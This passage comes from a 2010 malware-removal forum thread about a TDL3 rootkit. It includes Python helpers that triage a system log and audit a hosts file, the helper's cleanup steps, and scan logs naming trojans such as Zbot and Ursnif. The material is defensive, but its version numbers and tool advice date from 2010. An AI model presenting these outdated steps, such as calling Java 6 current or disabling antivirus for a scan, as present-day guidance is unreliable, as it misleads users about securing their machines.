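            recent = scan_time - modified <= timedelta(days=recent_days)
            # A system32 file rewritten this week but created years ago is the
            # shape of a patched driver: a reason to hash-check it, not proof.
            if (recent and path.startswith("c:\\windows\\system32\\")
                    and created < modified - timedelta(days=365)):
                findings.append(Finding("recent-system-file", m["path"]))
            # A dotfile sitting directly in Program Files (the 396-byte .js above).
            parent, _, name = path.rpartition("\\")
            if parent == "c:\\program files" and name.startswith("."):
                findings.append(Finding("odd-program-files-file",
                                        f"{m['path']} ({m['size']} bytes)"))
            continue
        m = KEY_RE.match(line)
        if m:
            current_key = m["key"].lower()
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        name, data = m["name"], m["data"]
        if ("security center\\monitoring" in current_key
                and name == "DisableMonitoring" and data.endswith("00000001")):
            # Third-party suites (McAfee here) set this so Security Center does
            # not double-alert; it only matters if nothing else is on duty.
            findings.append(Finding("securitycenter-monitoring-off",
                                    current_key.rsplit("\\", 1)[-1]))
        elif (current_key.endswith("firewallpolicy\\standardprofile")
                and name == "EnableFirewall" and data.startswith("0")):
            findings.append(Finding("windows-firewall-off", "standardprofile"))
        elif current_key.endswith("globallyopenports\\list"):
            port, _, proto = name.partition(":")
            note = " (RDP)" if port == "3389" else ""
            findings.append(Finding("open-port", f"{port}/{proto}{note}"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.kind:32} {f.detail}")
```

None of these flags is a verdict on its own: the DisableMonitoring values are normal when a third-party suite is installed, and a recently rewritten driver may simply be a patch, which is why the helper's first step at the top of the thread was to submit the suspect file to VirusTotal rather than delete it.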

Re: Help re: Browser Redirects & Raptr Install...

Unread postby melboy » September 23rd, 2010, 6:18 pm

Hi

The machines looking a lot better - How are things running?

Depending on the outcome of the MBAM & ESET scans we should be nearly done.


Update Java Runtime
You are using an old version of Java. Sun's Java is sometimes updated in order to eliminate the exploitation of vulnerabilities in an existing version. For this reason, it's extremely important that you keep the program up to date, and also remove the older more vulnerable versions from your system. The most current version of Sun Java is: Java Runtime Environment Version 6 Update 21.

  • Go to Sun Java
  • Scroll down to where it says "JDK 6 Update 21 (JDK or JRE)"
  • Click the orange Download JRE button to the right
  • In the Platform box choose Windows.
  • Check the box to Accept License Agreement and click Continue.
  • Click on Windows Offline Installation, click on the link under it which says "jre-6u21-windows-i586.exe" and save the downloaded file to your desktop.
  • Uninstall all old versions of Java via Start > Control Panel > Add/Remove Programs:
    J2SE Runtime Environment 5.0 Update 10
    J2SE Runtime Environment 5.0 Update 11
    J2SE Runtime Environment 5.0 Update 6
    J2SE Runtime Environment 5.0 Update 8
    J2SE Runtime Environment 5.0 Update 9
    Java 2 Runtime Environment, SE v1.4.2_03
    Java(TM) 6 Update 17
    Java(TM) 6 Update 2
    Java(TM) 6 Update 3
    Java(TM) 6 Update 5
    Java(TM) 6 Update 7
    Java(TM) SE Runtime Environment 6 Update 1
  • Install the new version by running the newly-downloaded file with the java icon which will be at your desktop, and follow the on-screen instructions.
  • Reboot your computer



TFC

  • Please download TFC by Old Timer to your desktop,
  • Save any unsaved work. TFC will close all open application windows.
  • Double-click TFC.exe to run the program.
  • Click the Start button in the bottom left of TFC
  • If prompted, click "Yes" to reboot.

Note: Save your work. TFC will automatically close any open programs; let it run uninterrupted. It should not take longer than a couple of minutes, and may only take a few seconds. Only if needed will you be prompted to reboot.



Malwarebytes' Anti-Malware (MBAM)

As you have Malwarebytes' Anti-Malware installed on your computer, could you please do a scan using these settings:

  • Open Malwarebytes' Anti-Malware
  • Select the Update tab
  • Click Check for Updates
  • After the update has been completed, select the Scanner tab.
  • Select Perform Quick scan, then click on Scan
  • When done, you will be prompted. Click OK. If Items are found, then click on Show Results
  • Check all items then click on Remove Selected
  • After it has removed the items, Notepad will open. Please post this log in your next reply.

    The log can also be found here:
    1. C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt
    2. Or via the Logs tab when the application is started.

Note: MBAM may ask to reboot your computer so it can continue with the removal process, please do so immediately.
Failure to reboot will prevent MBAM from removing all the malware.




ESET Online Scanner

Note: You can use either Internet Explorer or Mozilla Firefox for this scan. You will however need to disable your currently installed Anti-Virus; how to do so can be read here.

  • Please go here then click on: Image
    Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.
    All of the below instructions are compatible with either Internet Explorer or Mozilla Firefox.
  • Select the option YES, I accept the Terms of Use then click on: Image
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Now click on: Image
  • The virus signature database... will begin to download. Be patient; this may take some time depending on the speed of your Internet connection.
  • When completed the Online Scan will begin automatically.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • When completed make sure you first copy the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt
  • Copy and paste that log as a reply to this topic.
  • Now click on: Image (Selecting Uninstall application on close if you so wish)
  • Re-enable your anti-virus software.
melboy
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 23rd, 2010, 7:34 pm

Computer looking good Dude...

Uninstalled and Re-installed Java.

Ran TFC which cleared down alot of data.

Malware Log As follows...
_________________________________
Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Database version: 4665

Windows 5.1.2600 Service Pack 3
Internet Explorer 7.0.5730.11

24/09/2010 00:33:39
mbam-log-2010-09-24 (00-33-39).txt

Scan type: Quick scan
Objects scanned: 167906
Time elapsed: 13 minute(s), 21 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


Running other scan now....
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 24th, 2010, 3:11 am

ESET Online Scanner Results....

(* Apologies, I didn't check advanced settings to make sure that Scan for potentially unsafe applications was selected... other options were. Rerunning again now while I'm at work 8).
______________________________________________________
ESETSmartInstaller@High as CAB hook log:
OnlineScanner.ocx - registred OK
# version=7
# IEXPLORE.EXE=7.00.6000.17080 (vista_gdr.100616-0452)
# OnlineScanner.ocx=1.0.0.6211
# api_version=3.0.2
# EOSSerial=ece37a970719ac46951bea47476c6aad
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2010-09-24 04:07:42
# local_time=2010-09-24 05:07:42 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 192889 192889 0 0
# compatibility_mode=5121 16777173 100 75 336981 14543809 0 0
# compatibility_mode=8192 67108863 100 0 280 280 0 0
# scanned=195411
# found=5
# cleaned=0
# scan_time=15977
C:\Documents and Settings\All Users\Application Data\AOL Downloads\triton_uk\6.1.17.1\setup.exe probably a variant of Win32/Agent.HZHBURL trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\Documents and Settings\HP_Owner\cleanmgr.exe.vir a variant of Win32/Kryptik.GVN trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\WINDOWS\system32\termsrv.dll.vir Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1209\A0213023.exe Win32/Spy.Zbot.ZR trojan 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1214\A0226391.dll Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I

_________________________________________
Guess we have more work to do to remove these badboys....
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 24th, 2010, 11:36 am

Here's the updated log, logging for unsafe apps as well....

_______________________________________________

ESETSmartInstaller@High as CAB hook log:
OnlineScanner.ocx - registred OK
# version=7
# IEXPLORE.EXE=7.00.6000.17080 (vista_gdr.100616-0452)
# OnlineScanner.ocx=1.0.0.6211
# api_version=3.0.2
# EOSSerial=ece37a970719ac46951bea47476c6aad
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2010-09-24 04:07:42
# local_time=2010-09-24 05:07:42 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 192889 192889 0 0
# compatibility_mode=5121 16777173 100 75 336981 14543809 0 0
# compatibility_mode=8192 67108863 100 0 280 280 0 0
# scanned=195411
# found=5
# cleaned=0
# scan_time=15977
C:\Documents and Settings\All Users\Application Data\AOL Downloads\triton_uk\6.1.17.1\setup.exe probably a variant of Win32/Agent.HZHBURL trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\Documents and Settings\HP_Owner\cleanmgr.exe.vir a variant of Win32/Kryptik.GVN trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\WINDOWS\system32\termsrv.dll.vir Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1209\A0213023.exe Win32/Spy.Zbot.ZR trojan 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1214\A0226391.dll Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
esets_scanner_update returned -1 esets_gle=53251
# version=7
# IEXPLORE.EXE=7.00.6000.17080 (vista_gdr.100616-0452)
# OnlineScanner.ocx=1.0.0.6211
# api_version=3.0.2
# EOSSerial=ece37a970719ac46951bea47476c6aad
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2010-09-24 07:18:19
# local_time=2010-09-24 08:18:19 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 220003 220003 0 0
# compatibility_mode=5121 16777189 100 75 364095 14570923 0 0
# compatibility_mode=8192 67108863 100 0 27394 27394 0 0
# scanned=468
# found=1
# cleaned=0
# scan_time=302
C:\Documents and Settings\All Users\Application Data\AOL Downloads\triton_uk\6.1.17.1\setup.exe probably a variant of Win32/Agent.HZHBURL trojan 00000000000000000000000000000000 I
esets_scanner_update returned -1 esets_gle=53251
# version=7
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6211
# api_version=3.0.2
# EOSSerial=ece37a970719ac46951bea47476c6aad
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2010-09-24 10:29:38
# local_time=2010-09-24 11:29:38 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=2057
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 220357 220357 0 0
# compatibility_mode=5121 16777189 100 75 364449 14571277 0 0
# compatibility_mode=8192 67108863 100 0 27748 27748 0 0
# scanned=195593
# found=5
# cleaned=0
# scan_time=11424
C:\Documents and Settings\All Users\Application Data\AOL Downloads\triton_uk\6.1.17.1\setup.exe probably a variant of Win32/Agent.HZHBURL trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\Documents and Settings\HP_Owner\cleanmgr.exe.vir a variant of Win32/Kryptik.GVN trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\WINDOWS\system32\termsrv.dll.vir Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1209\A0213023.exe Win32/Spy.Zbot.ZR trojan 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1214\A0226391.dll Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby melboy » September 24th, 2010, 3:20 pm

Hi

Your log now appears to be clean.


Those detections by ESET were expected; they are files already quarantined by ComboFix and System Restore entries. System Restore will be reset by following the instructions below.

The setup.exe file is AOL instant messaging software (Aim 6), and a false positive.

To answer a couple of earlier questions, I wouldn't restart Spybot S&D's TeaTimer, though you might find its immunize feature useful if you don't already use it. McAfee and MBAM's realtime protection should suffice, with a couple of additions as mentioned further down the page.
No amount of security will protect you totally when using P2P filesharing and/or dabbling in cracks/keygens etc. There are always going to be some infections that slip through the net. It also helps to make sure you keep the OS and 3rd party software updated. Having older, exploitable versions of Java won't have helped you.

As well as the rootkit that was causing you problems, the malware you referred to in your first post, which you removed with MBAM prior to coming here, is known to attempt to steal passwords for a multitude of online activities (online banking information being one of them). It's important you change them.


=================


Right, that said: this is my general post for when your logs show no more signs of malware. Please let me know if you are still having problems with your computer and what these problems are. If not, please continue with the instructions below.


Uninstall Combofix
We Need to Remove ComboFix
  1. Please go to Start -> Run
  2. Enter "ComboFix /uninstall" (without quotes). Note the space between "ComboFix" and "/uninstall", it needs to be there.
  3. Press OK (Or hit enter).
  4. Allow ComboFix to remove itself.



OTC by OldTimer

Download OTC by Old Timer and save it to your Desktop.

  • Double-click OTC.exe
  • Click the CleanUp! button
  • Select Yes when the "Begin cleanup Process?" prompt appears
  • If you are prompted to Reboot during the cleanup, select Yes
  • The tool will delete itself once it finishes; if not, delete it yourself

You can also delete RKUnhooker and any associated logfiles.


=============================================

Your computer was infected with a ROOTKIT. In particular, the TDL3 rootkit, also known as Win32/Alureon. A rootkit is a set of software tools intended for concealing running processes, files or system data from the operating system.

Due to its rootkit functionality, it's impossible to tell what may have been done when the system was compromised.

Therefore it may be prudent to:

  1. Call all your banks, financial institutions, credit card companies and inform them that you may be a victim of identity theft and put a watch on your accounts.
  2. Change all your passwords (ISP login password, your email address(es) passwords, financial accounts, PayPal, eBay, Amazon, online groups and forums and any other online activities you carry out which require a username and password)

Windows Rootkits

How do I respond to a possible identity theft and how do I prevent it

==============================================


General Security and Computer Health
Below are some steps to follow in order to dramatically lower the chances of reinfection. You may have already implemented some of the steps below, however you should follow any steps that you have not already implemented.

  • Make sure that you keep your antivirus updated
    New viruses come out every minute, so it is essential that you have the latest signatures for your antivirus program to provide you with the best possible protection from malicious software.
    Note: You should only have one antivirus installed at a time. Having more than one antivirus program installed at once is likely to cause conflicts and may well decrease your overall protection as well as impairing the performance of your PC.
    Uninstall Tools for Major Antivirus Products

  • Security Updates for Windows, Internet Explorer & Microsoft Office
    Whenever a security problem in its software is found, Microsoft will usually create a patch so that after the patch is installed, attackers can't use the vulnerability to install malicious software on your PC. Keeping up with these patches will help to prevent malicious software being installed on your PC. Ensure you are registered for Windows updates via Start > right-click on My Computer > Properties > Automatic Updates tab or visit the Microsoft Update site on a regular basis.
    Note: The update process uses ActiveX, so you will need to use Internet Explorer for it and allow the ActiveX control to install.

  • Update Non-Microsoft Programs
    Microsoft isn't the only company whose products can contain security vulnerabilities. To check whether other programs running on your PC are in need of an update, you can use the Secunia Software Inspector - I suggest that you run it at least once a month.


Recommended Programs

I would recommend the download and installation of some or all of the following programs (if not already present), and the updating of them on a regular basis.

  • WinPatrol
    As a robust security monitor, WinPatrol will alert you to hijackings, malware attacks and critical changes made to your computer without your permission. WinPatrol takes a snapshot of your critical system resources and alerts you to any changes that may occur without your knowledge. For more information, please visit HERE.
  • Hosts File
    If you use the immunize feature with Spybot S&D for added protection, you may also like to add further hosts file entries. A simple explanation of what a Hosts file does is HERE, and for more information regarding hosts files read HERE.


Finally, I am trying to make one point very clear. It is absolutely essential to keep all of your security programs up to date.

Also, please read this great article by Tony Klein: So How Did I Get Infected In First Place

I'd be grateful if you could reply to this post so that I know you have read it and, if you've no other questions, the thread can be closed.

Happy surfing and stay clean!
melboy
MRU Expert
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK
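A hosts file check in the spirit of the immunization advice above, added here as an example and not part of the original post (the sample hosts content is constructed, and the `audit_hosts` helper is my own): it separates harmless block entries that point at 127.0.0.1 or 0.0.0.0 from entries that send a hostname to a routable address, which is the shape a browser-redirect hijack leaves behind in the hosts file.

```python
# Added example (not from the original post): audit a Windows hosts file.
# Immunization entries map bad hostnames to 127.0.0.1 / 0.0.0.0 (harmless);
# redirect malware maps legitimate hostnames to a routable address instead.
import ipaddress

# Constructed sample hosts file content, not taken from any real machine.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
# Start of entries inserted by Spybot - Search & Destroy
127.0.0.1 www.bad-example.invalid
0.0.0.0   ads.bad-example.invalid
# End of entries inserted by Spybot - Search & Destroy
203.0.113.7     www.example.com
203.0.113.7  bankofexample.invalid   # trailing comment
"""
BLOCK_ADDRESSES = {"127.0.0.1", "0.0.0.0", "::1"}

def parse_hosts(text):
    """Return (address, hostname) pairs; comments and blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop inline comments
        if not line:
            continue
        addr, *hosts = line.split()
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue   # malformed line: ignore rather than guess
        entries.extend((addr, h.lower()) for h in hosts)
    return entries

def audit_hosts(text):
    """Split entries into harmless block entries and suspicious redirects."""
    blocks, redirects = [], []
    for addr, host in parse_hosts(text):
        if addr not in BLOCK_ADDRESSES:
            redirects.append((addr, host))   # real IP: browser goes elsewhere
        elif host != "localhost":            # default loopback lines are normal
            blocks.append((addr, host))
    return blocks, redirects

if __name__ == "__main__":
    blocks, redirects = audit_hosts(SAMPLE_HOSTS)
    print(f"{len(blocks)} immunization-style block entries")
    for addr, host in redirects:
        print(f"SUSPICIOUS: {host} -> {addr}")
```

On a real machine, read C:\Windows\System32\drivers\etc\hosts and pass its contents to `audit_hosts`; any entry reported as suspicious deserves a look before assuming the redirect comes from the browser itself.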

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 24th, 2010, 3:27 pm

Excellent Work Melboy....
Thanks so much for your help and perseverance.
May the force be with you.

Thanks...
ZxcvB123
Regular Member
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby melboy » September 24th, 2010, 3:28 pm

You're welcome. :)
melboy
MRU Expert
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: Help re: Browser Redirects & Raptr Install...

Unread postby Gary R » September 24th, 2010, 5:08 pm

As your problems appear to have been resolved, this topic is now closed.

We are pleased we could help you resolve your computer's malware issues.

If you would like to make a comment or leave a compliment regarding the help you have received, please see Feedback for Our Helpers - Say "Thanks" Here.
Gary R
Administrator
Posts: 25888
Joined: June 28th, 2005, 11:36 am
Location: Yorkshire